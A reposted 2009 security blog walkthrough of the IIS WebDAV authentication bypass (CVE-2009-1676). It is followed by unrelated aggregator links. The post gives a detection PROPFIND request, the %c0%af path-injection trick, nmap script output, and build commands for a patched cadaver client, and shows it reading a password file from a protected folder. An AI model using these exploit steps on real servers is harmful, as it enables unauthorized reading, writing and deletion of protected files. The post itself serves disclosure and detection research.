WebDAV Detection, Vulnerability Checking and Exploitation
来源:互联网 发布:网络直播歌手排名 编辑:程序博客网 时间:2024/05/01 10:57
Ahoy! My name is Andrew and I’ve been playing with the recent IIS WebDAV authentication bypass vulnerability (CVE-2009-1676) and helping Ron with writing the nmap detection script (http-iis-webdav-vuln.nse) and testing it in the lab. Ron is in a meeting today so I thought I’d jump in where he left off and post a bit about how to detect if WebDAV is enabled and how to actually exploit a folder once you’ve determined it is vulnerable.
The first thing one should know when playing with this vulnerability is that the IIS server is not exploitable if the root folder is protected. Also if the root folder is protected, there is no way to determine if WebDAV is even enabled. That being said, if the root folder is _not_ protected then it’s time to break out the funky cold medina and have some fun.
Detecting if WebDAV is enabled
Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
* IIS 5.0/Windows 2000 SP4
On IIS 6.0, WebDAV is disabled by default. On IIS 5.0 and 5.1, WebDAV is enabled by default and you must edit the registry to disable it.
My method of detection simply involves running a PROPFIND request on the server. This is the same basic PROPFIND request we used in the http-iis-webdav-vuln.nse script:
PROPFIND / HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Type: application/xmlContent-Length: 298<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>
When WebDAV is enabled, it should return “HTTP/1.1 207 Multi-Status”.
When WebDAV has been disabled, it should return “HTTP/1.1 501 Not Supported”.
This is the method I’ve implemented in the http-iis-webdav-vuln.nse script. It works great in the lab on IIS servers. If we get back anything other than a 207 or 501 then we jump ship saying the web server is not supported. An Ubuntu server running Apache returns a 405 Method Not Allowed for instance.
Checking if a server is vulnerable
Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
Tested not working on
* IIS 5.0/Windows 2000 SP4
The original script only used one type of check; it would first find a protected folder (/secret/) and then try inserting the %c0%af character after the first /. It would turn /secret/ into /%c0%afsecret/.
This worked fine on IIS 6.0 but did not work at all on IIS 5.0/5.1. After playing with it some more today, we managed to get it working on IIS 5.1. The trick with 5.1 is that the %c0%af character can not be right after the / but must be somewhere in the middle of the folder name. This also works on IIS 6.0. I modified the script so that it uses the 5.1/6.0 check, turning /secret/ into /s%c0%afecret/.
Finding a vulnerable server
Tested working on
* IIS 6.0/Windows 2003 Enterprise SP2
* IIS 5.1/Windows XP Pro SP2
Tested not working on
* IIS 5.0/Windows 2000 SP4
Now for the fun part. If you havent turned on some funky cold medina yet, get to it because we’re almost done!
First thing we need to do is find a vulnerable server. I just happen to know of a Windows 2003 box in my lab running IIS 6.0 that is vulnerable (fully patched up to today btw). Lets see how an nmap scan of this box with the updated script works out:
> ./nmap -T4 -p80 --script=http-iis-webdav-vuln xxx.xxx.xxx.xxxStarting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-05-20 14:29 CDTInteresting ports on xxx.xxx.xxx.xxx:PORT STATE SERVICE80/tcp open http|_ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /secret, /webdavNmap done: 1 IP address (1 host up) scanned in 21.41 seconds
Interesting! So now we know the server has WebDAV enabled and that there are three vulnerable folders.
Exploiting it!
Now we could do everything by telnet-ing over port 80, but that’s not much fun (believe me, it’s very tedious!) so I went looking for a WebDAV client. I stumbled upon a FOSS one called cadaver, and based purely on the name I grabbed it. Now cadaver itself is a great little command line WebDAV client but I quickly realized it has a bunch of problems that won’t let us do what we wanted. The nice thing about FOSS is that it’s open, so we grabbed the cadaver-0.23.2 source and after hacking away at it for awhile, we came up with a little patch that makes it quite easy to exploit a server. Check the patch itself for the gritty details but basically it does the following:
1) Replace any “Depth: 0″ header with “Depth: 1″ (otherwise ls won’t work)
2) Append the header “Translate: f” to every request (otherwise get and probably others won’t work)
3) Insert the characters “%c0%af” into any uri request longer than 1 character.
So, grab the cadaver-0.23.2-h4x.patch and apply it to the cadaver-0.23.2 source from the cadaver website. Here’s the commands:
> mkdir cadaver-h4x> cd cadaver-h4x> wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch--snip--> wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz--snip--> tar xzvf cadaver-0.23.2.tar.gz--snip--> cd cadaver-0.23.2/> patch -p1 < ../cadaver-0.23.2-h4x.patchpatching file lib/neon/ne_basic.cpatching file lib/neon/ne_request.cpatching file lib/neon/ne_uri.c> ./configure--snip--> make--snip--
Now we should have a patched, compiled version of cadaver, so start it up with the server that was identified as having a vulnerable folder earlier:
> ./cadaver xxx.xxx.xxx.xxx
This should drop you to a “dav:/>” prompt. Now just cd into the vulnerable folder and check out what’s there:
dav:/> cd secretdav:/secret/> lsListing collection `/secret/': succeeded. password.txt 7 May 19 10:40dav:/secret/> cat password.txtDisplaying `/secret/password.txt':ron$pr0nsdav:/secret/>
And there you have it!
Here’s a list of commands that I’ve tested that work with the patched cadaver on a vulnerable folder:
* CD
* LS
* MOVE
* PUT
* GET
* CAT
* DELETE
Oddly enough, the COPY command does NOT work. We didn’t have time to investigate why, but the functionality can be duplicated by a get/local rename/put.
Also, this patched cadaver will not work for browsing regular WebDAV folders (non-vulnerable), so don’t try.
If anyone has been able to successfully exploit this on IIS 5.0 (Windows 2000), please contact me, we’ve been trying and can’t get it to work in the lab here.
Comments are welcome, you can also contact me by e-mail: andrew at andreworr dot ca
- WebDAV Detection, Vulnerability Checking and Exploitation
- ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)
- ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)
- Filesystem Formatting and Checking
- Testing and Checking Refined
- WebApp exploitation with Arachni and Metasploit
- HyperspectralData Exploitation Theory and Applications教程简介
- reinforcement learning,增强学习:Exploration and Exploitation
- WebDAV
- Webdav
- WebDAV
- WebDAV
- webdav
- WebDAV:"Web-based Distributed Authoring and Versioning"
- Easy Automated vulnerability scanning and reporting
- [python] 0x7 Python Tutorial: Web Scanning and Exploitation
- RL笔记_Balance exploration and exploitation 几种简单方法
- Reinforcement Learning_By David Silver笔记九: Exploration and Exploitation
- 总结自己常用的UltraEdit使用技巧
- 疯狂机器人-硬件
- 第一次上,发个帖子,哈哈O(∩_∩)O哈!
- Convert string type to int
- zk组件开发指南(1)
- WebDAV Detection, Vulnerability Checking and Exploitation
- 疯狂的机器人-软件
- 20090601
- 关于用友的CELL控件
- 信用卡套现风险骤然积聚 工行深发展深陷其中
- PHP学习的第一天
- Watin1.3 release
- J2ME 解析wml数据的例子
- Oracle性能诊断的方法